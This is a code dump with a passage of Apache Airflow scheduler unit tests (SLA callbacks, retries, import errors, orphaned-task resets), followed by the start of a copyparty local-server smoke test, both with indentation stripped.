# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
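# Only one slot is available in the pool, so exactly one of the two
# scheduled TIs should end up queued in the executor.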
self.assertEqual(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test that the schedule_interval is auto-aligned with the start_date,
so that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
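# Patch DagBag so any bag the scheduler builds resolves to the in-memory
# dagbag above, and stub collect_dags so nothing is re-parsed from disk.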
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEqual(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler calls the sla miss callback
"""
session = settings.Session()
sla_callback = MagicMock()
# Create dag with a start of 1 day ago, but an sla of 0
# so we'll already have an sla_miss on the books.
test_start_date = days_ago(1)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta()})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
assert sla_callback.called
def test_scheduler_sla_miss_callback_invalid_sla(self):
"""
Test that the scheduler does not call the sla miss callback when
given an invalid sla
"""
session = settings.Session()
sla_callback = MagicMock()
# Create dag with a start of 1 day ago, but an sla of 0
# so we'll already have an sla_miss on the books.
# Pass anything besides a timedelta object to the sla argument.
test_start_date = days_ago(1)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': None})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_sent_notification(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day
# ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
assert sla_callback.called
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='test@test.com',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
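# Run the task directly and swallow the expected AirflowException so the
# failure/retry path can be exercised in-process.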
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# The assertion on State.SCHEDULED was removed here because the scheduler
# moves the state from SCHEDULED to QUEUED. Now that the executor has been
# cleared the task should be allowed to re-queue, but tasks that remain in
# executor.queued_tasks after executor.heartbeat() are set back to the
# SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertIn(ti.state, [State.RUNNING, State.SUCCESS])
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
# 5s to wait for child process to exit, 1s dummy sleep
# in scheduler loop to prevent excessive logs and 1s for last loop to finish.
self.assertLess(run_duration - expected_run_duration, 6.0)
def test_dag_with_system_exit(self):
"""
Test that a DAG which calls sys.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test that a DAG with catchup=False only schedules runs from now onward, not back to its start date.
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# no_dags.py is empty; the *invalid_cron* files are excluded via .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEqual(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEqual(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(State.SCHEDULED, ti1.state)
self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEqual(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
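# Tasks in the RUNNING dag run that are QUEUED, SCHEDULED or NONE should end up
# with no state afterwards; tasks in the SUCCESS dag run must be left untouched.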
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
smoketest.py
|
import os
import sys
import time
import shlex
import shutil
import signal
import tempfile
import requests
import threading
import subprocess as sp
CPP = []
class Cpp(object):
def __init__(self, args):
args = [sys.executable, "-m", "copyparty"] + args
print(" ".join([shlex.quote(x) for x in args]))
self.ls_pre = set(list(os.listdir()))
self.p = sp.Popen(args)
# , stdout=sp.PIPE, stderr=sp.PIPE)
self.t = threading.Thread(target=self._run)
self.t.daemon = True
self.t.start()
def _run(self):
self.so, self.se = self.p.communicate()
def stop(self, wait):
if wait:
os.kill(self.p.pid, signal.SIGINT)
self.t.join(timeout=2)
else:
self.p.kill() # macos py3.8
def clean(self):
t = os.listdir()
for f in t:
if f not in self.ls_pre and f.startswith("up."):
os.unlink(f)
def await_idle(self, ub, timeout):
req = ["scanning</td><td>False", "hash-q</td><td>0", "tag-q</td><td>0"]
lim = int(timeout * 10)
u = ub + "?h"
for n in range(lim):
try:
time.sleep(0.1)
r = requests.get(u, timeout=0.1)
for x in req:
if x not in r.text:
print("ST: {}/{} miss {}".format(n, lim, x))
raise Exception()
print("ST: idle")
return
except:
pass
def tc1(vflags):
ub = "http://127.0.0.1:4321/"
td = os.path.join("srv", "smoketest")
try:
shutil.rmtree(td)
except:
if os.path.exists(td):
raise
for _ in range(10):
try:
os.mkdir(td)
except:
time.sleep(0.1) # win10
assert os.path.exists(td)
vidp = os.path.join(tempfile.gettempdir(), "smoketest.h264")
if not os.path.exists(vidp):
cmd = "ffmpeg -f lavfi -i testsrc=48x32:3 -t 1 -c:v libx264 -tune animation -preset veryslow -crf 69"
sp.check_call(cmd.split(" ") + [vidp])
with open(vidp, "rb") as f:
ovid = f.read()
args = [
"-p4321",
"-e2dsa",
"-e2tsr",
"--no-mutagen",
"--th-ff-jpg",
"--hist",
os.path.join(td, "dbm"),
]
pdirs = []
hpaths = {}
for d1 in ["r", "w", "a"]:
pdirs.append("{}/{}".format(td, d1))
pdirs.append("{}/{}/j".format(td, d1))
for d2 in ["r", "w", "a", "c"]:
d = os.path.join(td, d1, "j", d2)
pdirs.append(d)
os.makedirs(d)
pdirs = [x.replace("\\", "/") for x in pdirs]
udirs = [x.split("/", 2)[2] for x in pdirs]
perms = [x.rstrip("cj/")[-1] for x in pdirs]
perms = ["rw" if x == "a" else x for x in perms]
for pd, ud, p in zip(pdirs, udirs, perms):
if ud[-1] == "j" or ud[-1] == "c":
continue
hp = None
if pd.endswith("st/a"):
hp = hpaths[ud] = os.path.join(td, "db1")
elif pd[:-1].endswith("a/j/"):
hpaths[ud] = os.path.join(td, "dbm")
hp = None
else:
hp = "-"
hpaths[ud] = os.path.join(pd, ".hist")
arg = "{}:{}:{}".format(pd, ud, p)
if hp:
arg += ":c,hist=" + hp
args += ["-v", arg + vflags]
# return
cpp = Cpp(args)
CPP.append(cpp)
cpp.await_idle(ub, 3)
for d, p in zip(udirs, perms):
vid = ovid + "\n{}".format(d).encode("utf-8")
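# appending the url-path makes each uploaded file's bytes unique per volume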
